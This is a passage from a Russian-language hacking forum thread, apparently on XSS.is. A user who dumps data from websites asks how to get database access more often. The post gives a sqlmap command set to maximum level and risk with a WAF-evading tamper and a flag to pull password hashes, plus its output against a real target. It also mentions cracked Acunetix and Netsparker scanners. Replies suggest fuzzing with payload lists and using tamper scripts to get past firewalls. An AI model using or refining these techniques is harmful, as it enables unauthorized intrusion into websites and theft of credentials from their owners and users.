• XSS.stack #1 – первый литературный журнал от юзеров форума

советы по сливке.

cfx

working...
Пользователь
Регистрация
30.11.2021
Сообщения
61
Реакции
46
У вас должно быть более 10 сообщений для просмотра скрытого контента.
привет. уже давно занимаюсь сливами, но практически никогда склмап не дает доступ к админке. Я прописываю
Код:
sqlmap.py -r C:\1.txt --random-agent --level=5 --risk=3 --tamper=space2comment --threads=10  --passwords
конкретно эту уязвимость нашел акунетикс, юзаю версию 10.0 (мимо ходом, еще вопрос, нормальная ли эта версия? может есть новее, которая находит больше уязвимостей? p.s. офк юзаю кряк), по этому я запихнул запросы в файл и вот такая командочка получилась.)
По началу не давало, всегда сначала пробую без риска и лвла, потом во время прохода предлогает добавить минимальные левел и риск, соглашаюсь, но все равно не давало. Позже просто поставил фулл левел и риск , так же добавил тампер space2comment и дало.
Но вот сколько я занимаюсь этим, за все время дало 2 или 3 раза, но и то были сайт от одного админа. Хотелось бы как то увеличить этот шанс.
но выдает постоянно вот такое:
Код:
[19:07:00] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[19:07:00] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12
[19:07:00] [INFO] fetching database users password hashes
[19:07:00] [INFO] fetching database users
[19:07:00] [INFO] fetching number of database users
do you want to URL encode cookie values (implementation specific)? [Y/n] n
[19:07:01] [INFO] resumed: 1
[19:07:01] [INFO] retrieving the length of query output
[19:07:01] [INFO] retrieved: 28
[19:07:08] [INFO] retrieved: 'xxx'@'localhost'
[19:07:08] [INFO] fetching number of password hashes for user 'xxx'
[19:07:08] [INFO] retrieved:
[19:07:08] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[19:07:08] [INFO] retrieved:
[19:07:09] [WARNING] unable to retrieve the number of password hashes for user 'xxx'
[19:07:09] [ERROR] unable to retrieve the password hashes for the database users
[19:07:09] [INFO] fetched data logged to text files under 'xxx'

Как можно ее получить? Пробовал то, что рекомендовал мап в некоторых случаях, что то по типу, --hex, --no-cast, дропсет куки и флаш сессион, ничего из этого не помогает. Иногда попадется тайм басд блайнд и все, анрил что-то сделать.
Что можно еще попробовать, или может я что-то не так делаю. Пытался найти инфу, но видимо плохо искал или такого просто нет в интернете, про то как раскручивать скули, какие можно (или лучше) использовать для раскрутки.
Как лучше искать уязвимости и какими софтами, acunetix v10.0 и netsparker v6.1.0.31760. Буду благодарен любой помощи.
 
Вот на этом ресурсе описано много основ по sqli. Сканеры далеко не всегда дадут тебе результат. Админы также как и ты могут запустить и сканер и справить все, что он покажет. Лучше фазить параметры по списку пейлодов.
 
[19:07:09] [WARNING] unable to retrieve the number of password hashes for user 'xxx'
В большинстве случаев пароли (хэши) юзеров БД нельзя выдернуть из-за нехватки прав - юзер не имеет прав на чтение таблицы user в системной БД mysql. Поэтому ни какие тамперы, ноу хексы и ноу касты не помогут в любом случае. Вторая причина это разного рода защита, фаерволлы, правила, WAF'ы, которые в некоторых случаях можно обойти с помощью тамперов.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх